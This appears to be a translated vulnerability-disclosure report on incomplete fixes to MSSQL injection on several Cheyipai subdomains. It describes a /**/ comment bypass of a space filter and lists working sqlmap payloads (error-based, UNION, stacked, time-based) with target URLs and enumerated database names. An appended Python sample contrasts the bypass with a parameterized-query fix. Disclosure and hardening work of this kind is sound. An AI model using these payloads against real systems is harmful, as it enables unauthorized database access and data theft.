2015-02-07: Details sent to the vendor, awaiting the vendor's handling
2015-02-09: Vendor confirmed; details disclosed to the vendor only
2015-02-19: Details disclosed to core white hats and relevant domain experts
2015-03-01: Details disclosed to regular white hats
2015-03-11: Details disclosed to intern white hats
2015-03-24: Details disclosed to the public
Improper fix! Original report: WooYun: Cheyipai multiple MSSQL injections (UNION and error-based supported). Before the fix:
After the fix:
It looked as though the problem had been fixed; sqlmap did not find anything either. But.....
The problem is back!!! Replace the spaces in the payload with /**/ and, good grief, it actually bypasses the fix...
http://liantong.cheyipai.com:80/HttpHandler/UserCenter/ForgotPwd.ashx (POST)
action=Verify_User&userName=&ValidCode=e
Parameter: userName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: action=Verify_User&userName=' AND 6738=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6738=6738) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113))) AND 'qBEP'='qBEP&ValidCode=e

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: action=Verify_User&userName=' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(98)+CHAR(113)+CHAR(72)+CHAR(87)+CHAR(106)+CHAR(98)+CHAR(89)+CHAR(98)+CHAR(71)+CHAR(107)+CHAR(72)+CHAR(68)+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(98)+CHAR(113)-- &ValidCode=e

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: action=Verify_User&userName='; WAITFOR DELAY '0:0:5'--&ValidCode=e

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: action=Verify_User&userName=' WAITFOR DELAY '0:0:5'--&ValidCode=e
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
available databases [9]:
[*] DBSYSLog
[*] DFAUCTION_BENZ
[*] Manage
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb

As lijiejie said, the other affected locations:
http://dongfang.cheyipai.com/HttpHandler/UserCenter/ForgotPwd.ashx
http://kia.cheyipai.com/HttpHandler/UserCenter/ForgotPwd.ashx
-------------------------------------------
Second parameter:
http://kia.cheyipai.com/HttpHandler/UserCenter/UC07RegisterHandler.ashx?type=GetCityByProId (POST)
ParentCode=aaa
---
Parameter: ParentCode (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ParentCode=aaa' AND 5805=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5805=5805) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'vgEl'='vgEl

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: ParentCode=aaa' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(98)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(105)+CHAR(86)+CHAR(73)+CHAR(122)+CHAR(67)+CHAR(65)+CHAR(87)+CHAR(108)+CHAR(114)+CHAR(103)+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(98)+CHAR(113)--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ParentCode=aaa'; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: ParentCode=aaa' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
available databases [11]:
[*] DBSYS
[*] DBSYSLog
[*] DFAUCTION
[*] DFAUCTION_BENZ
[*] Manage
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
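The pattern behind the bypass and the fix that actually closes it, as an added example that is neither the report's nor the vendor's code: an in-memory SQLite table stands in for the MSSQL table behind ForgotPwd.ashx, the space-blacklist filter is an assumption about what the first fix did (the report only shows that swapping spaces for /**/ got past it), and the table, column and probe value are constructed here.

```python
import sqlite3

# Constructed sample rows standing in for the site's real user table.
SAMPLE_USERS = [("alice", "alice@example.invalid"), ("bob", "bob@example.invalid")]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite table standing in for the MSSQL table behind ForgotPwd.ashx."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userName TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def space_filter_blocks(value: str) -> bool:
    """Blacklist check modelled on the assumed first fix: reject any value that
    contains a space. An inline comment /**/ contains no space, so it passes."""
    return " " in value


def verify_user_concat(conn: sqlite3.Connection, user_name: str):
    """Vulnerable pattern (the 'before'): the value is spliced into the SQL text.
    Whatever the filter lets through reaches the SQL lexer, which treats /**/ as
    a token separator exactly like a space, so the blacklist changes nothing."""
    if space_filter_blocks(user_name):
        return None  # request refused by the filter
    sql = f"SELECT email FROM users WHERE userName = '{user_name}'"
    return conn.execute(sql).fetchall()


def verify_user_param(conn: sqlite3.Connection, user_name: str):
    """Hardened pattern (the real fix): a bound parameter is data, never SQL text.
    Quotes, comments and keywords inside it are compared literally against the
    column, so no input-side blacklist is needed for this query."""
    return conn.execute(
        "SELECT email FROM users WHERE userName = ?", (user_name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "x'/**/OR/**/'1'='1"  # constructed probe: spaces replaced by /**/ as in the report
    print("filter blocks probe:", space_filter_blocks(probe))   # False
    print("concatenated query:", verify_user_concat(db, probe))  # every row comes back
    print("parameterized query:", verify_user_param(db, probe))  # []
```

The concatenated variant returns every row for the probe while the parameterized one returns nothing, which is the check to run against a fix before closing the ticket.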
1. Test more thoroughly after fixing. 2. The New Year holiday is almost here; begging for 20 rank!!!
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-02-09 16:07
Investigation has begun; thanks for the submission.